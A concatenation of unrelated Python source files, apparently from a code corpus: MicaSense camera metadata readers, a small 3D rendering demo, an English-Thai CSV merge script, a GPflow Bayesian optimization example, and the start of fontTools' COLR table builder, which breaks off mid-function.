    """scattered component of the spectral irradiance (0.0 if tag absent)"""
    return self.__get_irrad("Xmp.DLS.ScatteredIrradiance")
def direct_irradiance(self) -> float:
    """
    direct component of the spectral irradiance on a plane normal
    to the vector towards the sun (0.0 if tag absent)
    """
    return self.__get_irrad("Xmp.DLS.DirectIrradiance")
def solar_azimuth(self) -> float:
    """solar azimuth at the time of capture, as calculated by the camera system"""
    # returns 0.0 when the tag is absent
    return self.__float_or_zero("Xmp.DLS.SolarAzimuth")
def solar_elevation(self) -> float:
    """solar elevation at the time of capture, as calculated by the camera system"""
    # returns 0.0 when the tag is absent
    return self.__float_or_zero("Xmp.DLS.SolarElevation")
def estimated_direct_vector(self) -> Union[List[float], None]:
    """estimated direct light vector relative to the DLS2 reference frame"""
    tag = "Xmp.DLS.EstimatedDirectLightVector"
    if tag not in self.meta.keys():
        return None
    return [float(component) for component in self.exif[tag].value]
def auto_calibration_image(self) -> bool:
    """
    True if this image is an auto-calibration image, where the camera has
    found and identified a calibration panel
    """
    # print("PLEASE TEST auto_calibration_image()")
    key = None
    # scan for an XMP tag ending in ".calibrationpicture"; if several
    # match, the last one wins (no break)
    for k in self.meta.keys():
        k_ = k.lower()
        if ("xmp." in k_) and (".calibrationpicture" in k_):
            key = k
    if key is None:
        cal_tag = None
    else:
        cal_tag = int(self.exif[key].value)
    # cal_tag == 2 marks an auto-calibration capture here; all panel tags
    # (albedo, region, serial) must also be present for the image to count
    return (
        cal_tag is not None
        and cal_tag == 2
        and self.panel_albedo() is not None
        and self.panel_region() is not None
        and self.panel_serial() is not None
    )
def panel_albedo(self) -> Union[float, None]:
    """
    Surface albedo of the active portion of the reflectance panel as
    calculated by the camera (usually from the information in the panel QR code)
    """
    # print("PLEASE TEST panel_albedo()")
    albedo_key = None
    # scan for an XMP tag ending in ".albedo"; the last match wins
    for tag in self.meta.keys():
        tag_lc = tag.lower()
        if "xmp." in tag_lc and ".albedo" in tag_lc:
            albedo_key = tag
    if albedo_key is None:
        return None
    return float(self.exif[albedo_key].value)
def panel_region(self) -> Union[None, List[int]]:
    """A 4-tuple containing image x,y coordinates of the panel active area"""
    # print("PLEASE TEST panel_region()")
    # NOTE(review): actually returns a list of (x, y) tuples (or None),
    # not a flat 4-tuple -- docstring and annotation look stale; confirm.
    key, coords = None, None
    # scan for an XMP tag ending in ".reflectarea"; the last match wins
    for k in self.meta.keys():
        if ("xmp." in k.lower()) and (".reflectarea" in k.lower()):
            key = k
    if key is not None:
        # the tag holds a flat "x1,y1,x2,y2,..." string; pair the values
        # into (x, y) coordinate tuples
        c_ = [float(i) for i in self.exif[key].value[0].split(",")]
        coords = list(zip(c_[0::2], c_[1::2]))
    return coords
def panel_serial(self) -> Union[str, None]:
    """The panel serial number as extracted from the image by the camera"""
    # print("PLEASE TEST panel_serial()")
    serial_key = None
    # scan for an XMP tag ending in ".panelserial"; the last match wins
    for tag in self.meta.keys():
        tag_lc = tag.lower()
        if "xmp." in tag_lc and ".panelserial" in tag_lc:
            serial_key = tag
    return self.exif[serial_key].value if serial_key is not None else None
class MetadataFromDict(object):
    """
    Container for Micasense image metadata extracted from yaml dictionary.

    Per-image values live under meta["image_data"][<image file name>];
    acquisition-wide values (camera make, DLS pose, etc.) live at the
    top level of the dictionary.
    """

    def __init__(
        self,
        filename: Union[str, Path],
        metadata_dict: dict,
    ):
        """
        Parameters
        ----------
        filename : Path or str
            The image (.tif) filename, used to extract the relevant
            metadata from the metadata_dict
        metadata_dict : dict
            The image-set acquisition metadata dictionary extracted from a
            yaml file.
        """
        if isinstance(filename, str):
            filename = Path(filename)
        # bare file name keys into meta["image_data"]
        self.im_name = filename.name
        self.meta = metadata_dict

    def print_all(self) -> None:
        """Print every top-level key/value pair of the metadata dict."""
        # fix: self.meta is a dict, not a callable -- iterating self.meta()
        # raised TypeError
        for item in self.meta:
            print("{}: {}".format(item, self.meta[item]))

    def dls_present(self) -> bool:
        """True if a downwelling light sensor was present for this image."""
        return self.meta["image_data"][self.im_name]["dls_present"]

    def supports_radiometric_calibration(self) -> bool:
        return self.meta["image_data"][self.im_name]["supports_radiometric_cal"]

    def position(self) -> Tuple[float, float, float]:
        """get the WGS-84 latitude, longitude tuple as signed decimal degrees"""
        # NOTE(review): the altitude key is spelled "dls_altitde" -- this may
        # mirror a typo in the yaml writer; confirm before "fixing" it here.
        return (
            self.meta["dls_latitude"],
            self.meta["dls_longitude"],
            self.meta["dls_altitde"],
        )

    def utc_time(self) -> datetime:
        """UTC capture time as recorded by the DLS."""
        return self.meta["dls_utctime"]

    def dls_pose(self) -> Tuple[float, float, float]:
        """get DLS pose as local earth-fixed yaw, pitch, roll in radians"""
        return (
            self.meta["dls_yaw"],
            self.meta["dls_pitch"],
            self.meta["dls_roll"],
        )

    def rig_relatives(self) -> Union[List[float], None]:
        return self.meta["image_data"][self.im_name]["rig_relatives"]

    def capture_id(self) -> Union[None, str]:
        return self.meta["capture_id"]

    def flight_id(self) -> Union[None, str]:
        return self.meta["flight_id"]

    def camera_make(self) -> Union[None, str]:
        # this should return "micasense"
        return self.meta["camera_make"]

    def camera_model(self) -> Union[None, str]:
        # this should return "RedEdge-M"
        return self.meta["camera_model"]

    def firmware_version(self) -> Union[None, str]:
        return self.meta["firmware_version"]

    def band_name(self) -> Union[None, str]:
        # for Red-Camera:
        #     Blue, Green, Red, NIR, Red edge
        # for Blue-Camera:
        #     Blue-444, Green-531, Red-650, Red edge-705, Red edge-740
        return self.meta["image_data"][self.im_name]["band_name"]

    def band_index(self) -> Union[None, int]:
        # for Red-Camera: 0, 1, 2, 3, 4
        # for Blue-Camera: 5, 6, 7, 8, 9
        return self.meta["image_data"][self.im_name]["rig_camera_index"]

    def exposure(self) -> float:
        """extract the exposure (integration time) in seconds"""
        return self.meta["image_data"][self.im_name]["exposure"]

    def gain(self) -> float:
        """extract the image gain"""
        return self.meta["image_data"][self.im_name]["gain"]

    def image_size(self) -> Tuple[int, int]:
        """extract the image size (ncols, nrows)"""
        return self.meta["image_size"]

    def center_wavelength(self) -> float:
        """extract the central wavelength (nm)"""
        return self.meta["image_data"][self.im_name]["wavelength_center"]

    def bandwidth(self) -> float:
        """extract the bandwidth (nm)"""
        return self.meta["image_data"][self.im_name]["wavelength_fwhm"]

    def radiometric_cal(self) -> List[float]:
        """extract the radiometric calibration coefficients"""
        return self.meta["image_data"][self.im_name]["rad_calibration"]

    def black_level(self) -> float:
        """Extract the mean dark current"""
        return self.meta["image_data"][self.im_name]["blacklevel"]

    def dark_pixels(self) -> float:
        """
        Get the average of the optically covered pixel values
        Note: these pixels are raw, and have not been radiometrically
              corrected. Use the black_level() method for all
              radiometric calibrations
        """
        return self.meta["image_data"][self.im_name]["darkpixels"]

    def bits_per_pixel(self) -> int:
        """
        get the number of bits per pixel, which defines the
        maximum digital number value in the image
        """
        return self.meta["bits_persample"]

    def vignette_center(self) -> List[float]:
        """get the vignette center in X and Y image coordinates"""
        return self.meta["image_data"][self.im_name]["vignette_xy"]

    def vignette_polynomial(self) -> List[float]:
        """
        get the radial vignette polynomial in the order
        it's defined within the metadata
        """
        return self.meta["image_data"][self.im_name]["vignette_poly"]

    def distortion_parameters(self) -> List[float]:
        return self.meta["image_data"][self.im_name]["distortion_params"]

    def principal_point(self) -> List[float]:
        return self.meta["image_data"][self.im_name]["principal_point"]

    def focal_plane_resolution_px_per_mm(self) -> Tuple[float, float]:
        return self.meta["focalplane_xres"], self.meta["focalplane_yres"]

    def focal_length_mm(self) -> float:
        return self.meta["image_data"][self.im_name]["focal_length_mm"]

    def sfactor_35mm(self) -> float:
        """
        extract the 35mm scale factor, sf[35], such that,
        35 mm equivalent focal length = sf[35] * focal_length
        """
        def __calc_backend(pxl_um: float, ncols: int, nrows: int) -> float:
            """
            Backend calculation of the 35 mm scale factor
            Parameters
            ----------
            pxl_um : pixel size (micrometers, um) [float]
            ncols : image width (or number of image columns) [int]
            nrows : image height (or number of image rows) [int]
            """
            pxl_mm = pxl_um / 1000.0  # pixel size in mm
            # ratio of the 35 mm full-frame diagonal (36 x 24 mm) to the
            # sensor diagonal
            diag_img = ((ncols * pxl_mm) ** 2 + (nrows * pxl_mm) ** 2) ** 0.5
            diag_35mm = ((36.0) ** 2 + (24.0) ** 2) ** 0.5
            return diag_35mm / diag_img

        w, h = self.image_size()
        # default pixel pitch; Altum uses 3.45 um except its LWIR (thermal)
        # band, which has a 12 um pitch
        pxl_size = 3.75  # micrometers
        if self.camera_model() == "Altum":
            if self.band_name().lower() == "lwir":
                pxl_size = 12.0  # micrometers
            else:
                pxl_size = 3.45
        return __calc_backend(pxl_size, w, h)

    def focal_length_35_mm_eq(self) -> float:
        # pyexiv2 cannot access the Composite keys including:
        # Composite:FocalLength35efl
        return self.meta["image_data"][self.im_name]["focal_length"] * self.sfactor_35mm()

    def irradiance_scale_factor(self) -> float:
        # return the conversion factor to get irradiance as SI units
        return self.meta["image_data"][self.im_name]["irradiance_scale_factor"]

    def horizontal_irradiance_valid(self) -> bool:
        return self.meta["image_data"][self.im_name]["horizontal_irradiance_valid"]

    def spectral_irradiance(self) -> float:
        """
        LEGACY FUNCTION
        Raw spectral irradiance measured by an irradiance sensor.
        Calibrated to W/m^2/nm using irradiance_scale_factor, but
        not corrected for angles
        """
        return (
            self.meta["image_data"][self.im_name]["dls_Ed"]
            * self.irradiance_scale_factor()
        )

    def horizontal_irradiance(self) -> float:
        """
        Horizontal irradiance at the earth's surface below the DLS on the
        plane normal to the gravity vector at the location (local flat
        plane spectral irradiance)
        """
        return (
            self.meta["image_data"][self.im_name]["dls_Ed_h"]
            * self.irradiance_scale_factor()
        )

    def scattered_irradiance(self) -> float:
        """scattered component of the spectral irradiance"""
        return (
            self.meta["image_data"][self.im_name]["dls_Ed_s"]
            * self.irradiance_scale_factor()
        )

    def direct_irradiance(self) -> float:
        """
        direct component of the spectral irradiance on a plane normal
        to the vector towards the sun
        """
        return (
            self.meta["image_data"][self.im_name]["dls_Ed_d"]
            * self.irradiance_scale_factor()
        )

    def solar_azimuth(self) -> float:
        """solar azimuth at the time of capture, as calculated by the camera system"""
        return self.meta["dls_solarazi"]

    def solar_elevation(self) -> float:
        """solar elevation at the time of capture, as calculated by the camera system"""
        # NOTE(review): reads the "dls_solarzen" (zenith?) key -- confirm the
        # yaml writer stores elevation under this name.
        return self.meta["dls_solarzen"]

    def estimated_direct_vector(self) -> Union[List[float], None]:
        """estimated direct light vector relative to the DLS2 reference frame"""
        return self.meta["image_data"][self.im_name]["dls_EstimatedDirectLightVector"]

    def auto_calibration_image(self) -> bool:
        return self.meta["image_data"][self.im_name]["auto_calibration_image"]

    def panel_albedo(self) -> Union[float, None]:
        return self.meta["image_data"][self.im_name]["panel_albedo"]

    def panel_region(self) -> Union[None, List[int]]:
        return self.meta["image_data"][self.im_name]["panel_region"]

    def panel_serial(self) -> Union[str, None]:
        return self.meta["image_data"][self.im_name]["panel_serial"]
|
<reponame>skunkwile/UW-Graphics<gh_stars>1-10
import display
from engine import *
from math import pi
import numpy as np
# Half-resolution 4:3 window
size = width, height = (1280 // 2, 960 // 2)
scene = Scene()
# Earlier experimental meshes, kept for reference:
# mesh = Mesh([
#     Vec3(-10, 0, 0),
#     Vec3(0, 0, -5),
#     Vec3(3, 0, 7),
#     Vec3(4, 0, 1),
# ], [(0, 1, 2)])
# mesh = Mesh([
#     Vec3(1, 0, 1),    # TOP RIGHT
#     Vec3(-1, 0, 1),   # TOP LEFT
#     Vec3(-1, 0, -1),  # BOTTOM LEFT
#     Vec3(1, 0, -1),   # BOTTOM RIGHT
# ], [(0, 1, 2), (2, 3, 0)])
# Unit cube: 8 corner vertices, 12 triangles (two per face)
mesh = Mesh(np.asarray([
    (1, 1, 1),
    (-1, 1, 1),
    (1, 1, -1),
    (-1, 1, -1),
    (1, -1, 1),
    (-1, -1, 1),
    (1, -1, -1),
    (-1, -1, -1),
]), np.asarray([
    (0, 2, 3), (0, 3, 1),
    (1, 3, 5), (3, 7, 5),
    (2, 7, 3), (2, 6, 7),
    (4, 7, 6), (4, 5, 7),
    (0, 4, 2), (2, 4, 6),
    (0, 5, 1), (0, 4, 5)
]))
# mesh = Mesh(np.asarray([
#     (0, 1, 0),
#     (-1, -1, 0),
#     (1, -1, 0)
# ]), np.asarray([
#     (0, 1, 2)
# ]))
# node = Node(mesh, Transform.of(translation=np.asarray([0, 0, -10]), scaling=np.asarray([50, 50, 50])))
# node_rotation/node_scale are kept at module level because key_handler
# rebuilds the node Transform from them on every rotation/scale key press
node_rotation = np.asarray([0, 0, pi / 4])
node_scale = np.asarray([1, 1, 1]) * 2
node = Node(mesh, Transform.of(np.asarray([-1, -4, 57]), node_rotation, node_scale))
scene.root.add_child(node)
camera = Camera(4, 4, 3, 1, 100)
scene.root.add_child(camera)
scene.active_camera = camera
# redraw flag: set by key_handler, consumed by main_loop
should_draw = True
def main_loop(screen):
    """Per-frame callback: render the scene only when a redraw is pending."""
    global should_draw
    if not should_draw:
        return
    screen.draw(scene.render(screen))
    should_draw = False
def key_handler(key):
    """Mutate the scene node/camera in response to a key press and request a redraw."""
    global should_draw
    # print("KEY: "+key)
    # Translation: a/d move along x, w/s along y, q/e along z
    if key == 'a':
        node.transform.translation[0] -= 1
    elif key == 'd':
        node.transform.translation[0] += 1
    elif key == 'w':
        node.transform.translation[1] += 1
    elif key == 's':
        node.transform.translation[1] -= 1
    elif key == 'q':
        node.transform.translation[2] -= 1
    elif key == 'e':
        node.transform.translation[2] += 1
    # Rotation in pi/16 steps: f/h around z, t/g around x, r/y around y.
    # The Transform is rebuilt because rotation state lives in node_rotation.
    if key == 'f':
        node_rotation[2] -= pi / 16
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'h':
        node_rotation[2] += pi / 16
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 't':
        node_rotation[0] -= pi / 16
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'g':
        node_rotation[0] += pi / 16
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'r':
        node_rotation[1] -= pi / 16
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'y':
        node_rotation[1] += pi / 16
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    # Scaling in 0.25 steps: u/j along x, i/k along y, o/l along z
    if key == 'u':
        node_scale[0] += 0.25
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'j':
        node_scale[0] -= 0.25
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'i':
        node_scale[1] += 0.25
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'k':
        node_scale[1] -= 0.25
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'o':
        node_scale[2] += 0.25
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    elif key == 'l':
        node_scale[2] -= 0.25
        node.transform = Transform.of(node.transform.translation, node_rotation, node_scale)
    # Camera zoom: z halves, x doubles the focal length
    elif key == 'z':
        camera.focal_length *= 0.5
        # print(camera.focal_length)
    elif key == 'x':
        camera.focal_length *= 2
        # print(camera.focal_length)
    # any key press triggers a re-render on the next frame
    should_draw = True
    # screen.draw(scene.render(screen))
    # print(node.transform)
# Start the UI loop: main_loop renders each frame, key_handler reacts to input
display.Screen(*size, title="UW Graphics", frame_rate=60, update=main_loop, callback=key_handler)
# while True:
#     time.sleep(0.5)
#     print("PING")
<filename>scripts/merge_csv_files.py
import argparse
import os
import glob
import time
import csv
from pathlib import Path
from collections import Counter
from tqdm.auto import tqdm
import pandas as pd
def main(csv_directory, out_directory):
    """Load every .csv in *csv_directory*, report per-dataset sentence-pair
    counts, then merge all datasets into a single csv in *out_directory*.

    Parameters
    ----------
    csv_directory : str
        Directory containing the per-dataset .csv files.
    out_directory : str
        Directory where the merged file will be written.
    """
    csv_files = glob.glob(os.path.join(csv_directory, '*.csv'))
    df_list = {}
    sent_pairs_counter = Counter()
    for filepath in csv_files:
        # each DataFrame is keyed by its file stem (the dataset name)
        filename = Path(filepath).stem
        df_list[filename] = pd.read_csv(filepath)
        sent_pairs_counter[filename] = df_list[filename].shape[0]
    # fix: header previously read "Statisitcs"
    print('\nDataset Statistics:\n')
    print('-' * 30)
    print('')
    # report datasets in descending order of sentence-pair count
    for k, v in sent_pairs_counter.most_common(len(sent_pairs_counter)):
        print(f'Sub-dataset: {k:30}, # Sentence pairs: {v:10,}')
    print('')
    print(f'\nTotal: {sum(sent_pairs_counter.values()):10,}')
    write_to_txt(out_directory, df_list)
def write_to_txt(out_directory, df_list):
    """Merge the DataFrames in *df_list* into `<out_directory>/en-th.merged.csv`.

    Each output row carries a sentence id of the form "<row_index>:<dataset>",
    the English and Thai texts (with embedded newlines removed), and two flags
    marking whether each side is unique across the whole merged corpus.

    Parameters
    ----------
    out_directory : str
        Destination directory; created if it does not exist.
    df_list : dict
        Mapping of dataset name -> pandas DataFrame with `en_text` and
        `th_text` columns.
    """
    if not os.path.exists(out_directory):
        print(f'\nCreate a directory at: `{out_directory}`')
        os.makedirs(out_directory, exist_ok=True)
    out_path = os.path.join(out_directory, 'en-th.merged.csv')
    print(f'\n\nBegin writing file in txt format to: `{out_path}`.\n')
    # build "<index>:<dataset>" ids; iterating df.index directly avoids the
    # cost of materializing every row that df.iterrows() incurs
    merged_item_ids = [
        f'{index}:{dataset_name}'
        for dataset_name, df in df_list.items()
        for index in df.index
    ]
    # concatenate all datasets in the same order as merged_item_ids
    merged_en_texts = pd.concat([df.en_text for _, df in df_list.items()]).apply(
        lambda x: str(x).strip())
    merged_th_texts = pd.concat([df.th_text for _, df in df_list.items()]).apply(
        lambda x: str(x).strip())
    # keep=False marks *every* occurrence of a duplicated text, so a sentence
    # is "unique" only if it appears exactly once in the merged corpus
    merged_en_texts_is_duplicated = merged_en_texts.duplicated(
        keep=False).tolist()
    merged_th_texts_is_duplicated = merged_th_texts.duplicated(
        keep=False).tolist()
    with open(out_path, 'w', encoding='utf-8') as f:
        writer = csv.writer(f, delimiter=',', quotechar='"',
                            quoting=csv.QUOTE_MINIMAL)
        writer.writerow(['sentence_id', 'en', 'th',
                         'is_en_uniq', 'is_th_uniq'])
        for index, sentence_id in tqdm(enumerate(merged_item_ids), total=len(merged_item_ids)):
            is_en_uniq = not merged_en_texts_is_duplicated[index]
            is_th_uniq = not merged_th_texts_is_duplicated[index]
            # strip embedded newlines so each pair stays on one csv record
            en, th = merged_en_texts.iloc[index].replace(
                '\n', ''), merged_th_texts.iloc[index].replace('\n', '')
            writer.writerow([sentence_id, en, th, is_en_uniq, is_th_uniq])
    print('\nDone merging csv files into a txt file.')
if __name__ == '__main__':
    # CLI: positional input directory, optional output directory
    parser = argparse.ArgumentParser()
    parser.add_argument(
        'csv_dir', help='Directory that stored the dataset in .csv format')
    parser.add_argument('--out_dir', help='Directory that stored merged dataset in .txt format',
                        default='./dataset/merged')
    args = parser.parse_args()
    csv_directory = args.csv_dir
    out_directory = args.out_dir
    main(csv_directory, out_directory)
|
import numpy as np
import matplotlib.pyplot as plt
import gpflow
def dbtime(X):
    """Synthetic 2-D objective used to exercise the optimizer.

    Parameters
    ----------
    X : np.ndarray of shape (n, 2); column 0 drives a quadratic bowl,
        column 1 drives a sum of sinusoids.

    Returns
    -------
    np.ndarray of shape (n,)
    """
    first = X[:, 0]
    second = X[:, 1]
    bowl = (first / 2 - 2) * (first / 2 - 2) + 2
    return (bowl
            + 2 * np.sin(second) + 2 * np.sin(second * 2) + 5 + np.sin(second / 2)
            + 2 * np.sin(second) + 2 * np.sin(second * 2) + 5 + np.sin(second / 2))
class Optimize():
    """
    Minimal Bayesian-optimization loop: fit a GPflow GP regression to the
    sampled points and pick the next sample by maximizing the acquisition
    function (-mean + var).
    """
    def __init__(self, func, start_point, nb_param ):
        # func: objective function; start_point: number of random seed
        # points; nb_param: number of input dimensions, each sampled
        # uniformly in [0, 10)
        self.func = func
        self.nb_param= nb_param
        self.start_point = start_point
        self.X = np.random.rand(start_point,1)*10
        print("Random first parameter:")
        print(self.X)
        for i in range(self.nb_param-1):
            print("Random next parameter:")
            xp = np.random.rand(start_point,1)*10
            self.X = np.concatenate( (self.X, xp), axis=1 )
        self.Y = self.func(self.X)
        # GPflow expects Y as a column vector
        self.Y = self.Y.reshape(len(self.Y), 1)
        self.run = 0
        self.plt = plt
    def buildModelGaussien(self):
        '''
        Perform the Gaussian-process regression with GPflow
        '''
        # Kernel definition: one Matern 5/2 kernel per input dimension,
        # with the lengthscale frozen at 1.0 (not trainable)
        k1 = gpflow.kernels.Matern52(1, active_dims=[0], lengthscales=0.3)
        k1.lengthscales.trainable = False
        k1.lengthscales = 1.0
        k2 = gpflow.kernels.Matern52(1, active_dims=[1], lengthscales=0.3)
        k2.lengthscales.trainable = False
        k2.lengthscales = 1.0
        self.k = k1 + k2
        # Model definition
        self.m = gpflow.models.GPR(self.X, self.Y, kern=self.k)
        # Lengthscale adjustment was done above; compile the model
        self.m.compile()
        # Optimize the remaining hyper-parameters
        gpflow.train.ScipyOptimizer().minimize(self.m)
    def getNextPoint(self):
        '''
        Determine the next point to explore.
        Based on an acquisition function: fct = -mean + var
        '''
        # Build a 100x100 candidate grid covering [0, 10) in both dimensions
        xx = None
        for xx1 in range(0,100):
            for xx2 in range(0,100):
                if xx is None:
                    xx = np.array([[xx1,xx2]])
                else:
                    xx = np.concatenate((xx, [[xx1,xx2]]))
        xx = xx / 10
        # Predict mean and variance vectors for every candidate point
        mean, var = self.m.predict_y(xx)
        #print("variance %s:" % (var))
        # Acquisition values for all candidates
        # (favors low predicted mean and high uncertainty)
        acqu = (-mean+var)
        # Flatten so the argmax can be taken over a 1-D array
        acquflatten = acqu.flatten()
        # Locate the best acquisition value
        maxvalue = max(acquflatten)
        #print("Max found: %s " % maxvalue)
        # Find the associated candidate index
        whereisit = np.where(acquflatten ==maxvalue )[0][0]
        # The next point to sample is therefore:
        next_abs = xx[whereisit]
        # Evaluate the objective there and grow the training set X, Y
        self.X = np.concatenate( (self.X, [next_abs]))
        result = self.func(next_abs.reshape((1,2)))
        #print("After search %s: " % result)
        self.Y = np.concatenate( (self.Y, result.reshape((1,1)) ) )
        self.run += 1
        return next_abs
    def plot_mg(self):
        # Plot data, GP mean, and a 2-sigma confidence band.
        # NOTE(review): builds a 1-D grid, so this helper only works for a
        # single-parameter model -- confirm before using with nb_param=2.
        xx = np.linspace(0, 10, 100)[:,None]
        mean, var = self.m.predict_y(xx)
        self.plt.plot(self.X, self.Y, 'kx', mew=2)
        self.plt.plot(xx, mean, 'b', lw=2)
        self.plt.fill_between(xx[:,0], mean[:,0] - 2*np.sqrt(var[:,0]), mean[:,0] + 2*np.sqrt(var[:,0]), color='blue', alpha=0.2)
    def plot_acq(self):
        # Plot a rescaled acquisition curve (1-D grid; see note in plot_mg)
        xx = np.linspace(0, 10, 100)[:,None]
        mean, var = self.m.predict_y(xx)
        self.plt.plot(xx, (-mean+var)/5-4, color='green')
    def print(self):
        # Dump the sampled inputs and observed outputs
        print("Content of X:")
        print(self.X)
        print("Content of Y:")
        print(self.Y)
    def savefig(self):
        # Render the current state of the search to result6a_<run>.png
        self.plt.figure(self.run)
        self.plt.grid()
        self.plt.xlim(0,10)
        self.plt.ylim(-6,10)
        self.plt.title("Run %s après un depart aléatoire de %s points" % (self.run, self.start_point))
        self.plot_dbtime()
        self.plot_mg()
        self.plot_acq()
        self.plt.savefig('result6a_%s.png' % (self.run))
    def plot_dbtime(self):
        # Plot the true objective in red.
        # NOTE(review): passes a 1-D array to func, which indexes X[:,1] --
        # this only works for 1-D objectives; confirm before use.
        xfct = np.arange(0,np.pi*4,0.1)
        yfct = self.func(xfct)
        self.plt.plot(xfct,yfct, color='red')
print ('Starting...')
# seed the optimizer with 10 random 2-D points on the dbtime objective
opt = Optimize( dbtime, 10, 2 )
opt.print()
opt.buildModelGaussien()
next_abs = opt.getNextPoint()
print ('Searching for min...')
# alternate acquisition-driven sampling and model refitting for 20 rounds
for i in range(20):
    next_abs = opt.getNextPoint()
    print("Next point to explore: %s and dbtime(x)=%s" % (next_abs,dbtime(next_abs.reshape((1,2)))))
    opt.buildModelGaussien()
|
"""
colorLib.builder: Build COLR/CPAL tables from scratch
"""
import collections
import copy
import enum
from functools import partial
from typing import (
Any,
Dict,
Generator,
Iterable,
List,
Mapping,
Optional,
Sequence,
Tuple,
Type,
TypeVar,
Union,
)
from fontTools.misc.fixedTools import fixedToFloat
from fontTools.ttLib.tables import C_O_L_R_
from fontTools.ttLib.tables import C_P_A_L_
from fontTools.ttLib.tables import _n_a_m_e
from fontTools.ttLib.tables.otBase import BaseTable
from fontTools.ttLib.tables import otTables as ot
from fontTools.ttLib.tables.otTables import (
ExtendMode,
CompositeMode,
VariableValue,
VariableFloat,
VariableInt,
)
from .errors import ColorLibError
# TODO move type aliases to colorLib.types?
T = TypeVar("T")
# Keyword arguments used to construct an otTables object from a dict.
_Kwargs = Mapping[str, Any]
# A paint may be given as a format number, a kwargs dict, a built ot.Paint,
# or a (glyphName, paint) tuple.
_PaintInput = Union[int, _Kwargs, ot.Paint, Tuple[str, "_PaintInput"]]
_PaintInputList = Sequence[_PaintInput]
_ColorGlyphsDict = Dict[str, Union[_PaintInputList, _PaintInput]]
# COLRv0 input: base glyph -> [(layerGlyph, paletteIndex), ...]
_ColorGlyphsV0Dict = Dict[str, Sequence[Tuple[str, int]]]
_Number = Union[int, float]
# A scalar may be a plain number, a VariableValue, or a (value, varIdx) pair.
_ScalarInput = Union[_Number, VariableValue, Tuple[_Number, int]]
_ColorStopTuple = Tuple[_ScalarInput, int]
_ColorStopInput = Union[_ColorStopTuple, _Kwargs, ot.ColorStop]
_ColorStopsList = Sequence[_ColorStopInput]
_ExtendInput = Union[int, str, ExtendMode]
_CompositeInput = Union[int, str, CompositeMode]
_ColorLineInput = Union[_Kwargs, ot.ColorLine]
_PointTuple = Tuple[_ScalarInput, _ScalarInput]
_AffineTuple = Tuple[
    _ScalarInput, _ScalarInput, _ScalarInput, _ScalarInput, _ScalarInput, _ScalarInput
]
_AffineInput = Union[_AffineTuple, ot.Affine2x3]
# Hard limit on the number of layers referenced by a single paint record.
MAX_PAINT_COLR_LAYER_COUNT = 255
def populateCOLRv0(
    table: ot.COLR,
    colorGlyphsV0: _ColorGlyphsV0Dict,
    glyphMap: Optional[Mapping[str, int]] = None,
):
    """Build v0 color layers and add to existing COLR table.
    Args:
        table: a raw otTables.COLR() object (not ttLib's table_C_O_L_R_).
        colorGlyphsV0: map of base glyph names to lists of (layer glyph names,
            color palette index) tuples.
        glyphMap: a map from glyph names to glyph indices, as returned from
            TTFont.getReverseGlyphMap(), to optionally sort base records by GID.
    """
    colorGlyphItems = colorGlyphsV0.items()
    if glyphMap is not None:
        # order base glyph records by glyph ID when a glyph map is supplied
        colorGlyphItems = sorted(colorGlyphItems, key=lambda entry: glyphMap[entry[0]])
    baseGlyphRecords = []
    layerRecords = []
    for baseGlyph, layers in colorGlyphItems:
        # each base glyph references a contiguous run of layer records
        baseRec = ot.BaseGlyphRecord()
        baseRec.BaseGlyph = baseGlyph
        baseRec.FirstLayerIndex = len(layerRecords)
        baseRec.NumLayers = len(layers)
        baseGlyphRecords.append(baseRec)
        for layerGlyph, paletteIndex in layers:
            layerRec = ot.LayerRecord()
            layerRec.LayerGlyph = layerGlyph
            layerRec.PaletteIndex = paletteIndex
            layerRecords.append(layerRec)
    table.BaseGlyphRecordCount = len(baseGlyphRecords)
    table.BaseGlyphRecordArray = ot.BaseGlyphRecordArray()
    table.BaseGlyphRecordArray.BaseGlyphRecord = baseGlyphRecords
    table.LayerRecordArray = ot.LayerRecordArray()
    table.LayerRecordArray.LayerRecord = layerRecords
    table.LayerRecordCount = len(layerRecords)
def buildCOLR(
    colorGlyphs: _ColorGlyphsDict,
    version: Optional[int] = None,
    glyphMap: Optional[Mapping[str, int]] = None,
    varStore: Optional[ot.VarStore] = None,
) -> C_O_L_R_.table_C_O_L_R_:
    """Build COLR table from color layers mapping.
    Args:
        colorGlyphs: map of base glyph name to, either list of (layer glyph name,
            color palette index) tuples for COLRv0; or a single Paint (dict) or
            list of Paint for COLRv1.
        version: the version of COLR table. If None, the version is determined
            by the presence of COLRv1 paints or variation data (varStore), which
            require version 1; otherwise, if all base glyphs use only simple color
            layers, version 0 is used.
        glyphMap: a map from glyph names to glyph indices, as returned from
            TTFont.getReverseGlyphMap(), to optionally sort base records by GID.
        varStore: Optional ItemVariationStore for deltas associated with v1 layer.
    Return:
        A new COLR table.
    """
    self = C_O_L_R_.table_C_O_L_R_()
    if varStore is not None and version == 0:
        raise ValueError("Can't add VarStore to COLRv0")
    if version in (None, 0) and not varStore:
        # split color glyphs into v0 and v1 and encode separately
        colorGlyphsV0, colorGlyphsV1 = _split_color_glyphs_by_version(colorGlyphs)
        if version == 0 and colorGlyphsV1:
            raise ValueError("Can't encode COLRv1 glyphs in COLRv0")
    else:
        # unless explicitly requested for v1 or have variations, in which case
        # we encode all color glyph as v1
        colorGlyphsV0, colorGlyphsV1 = None, colorGlyphs
    colr = ot.COLR()
    if colorGlyphsV0:
        populateCOLRv0(colr, colorGlyphsV0, glyphMap)
    else:
        # no v0 glyphs: leave the v0 record arrays empty
        colr.BaseGlyphRecordCount = colr.LayerRecordCount = 0
        colr.BaseGlyphRecordArray = colr.LayerRecordArray = None
    if colorGlyphsV1:
        colr.LayerV1List, colr.BaseGlyphV1List = buildColrV1(colorGlyphsV1, glyphMap)
    if version is None:
        # infer the version: any v1 paints or variation data force version 1
        version = 1 if (varStore or colorGlyphsV1) else 0
    elif version not in (0, 1):
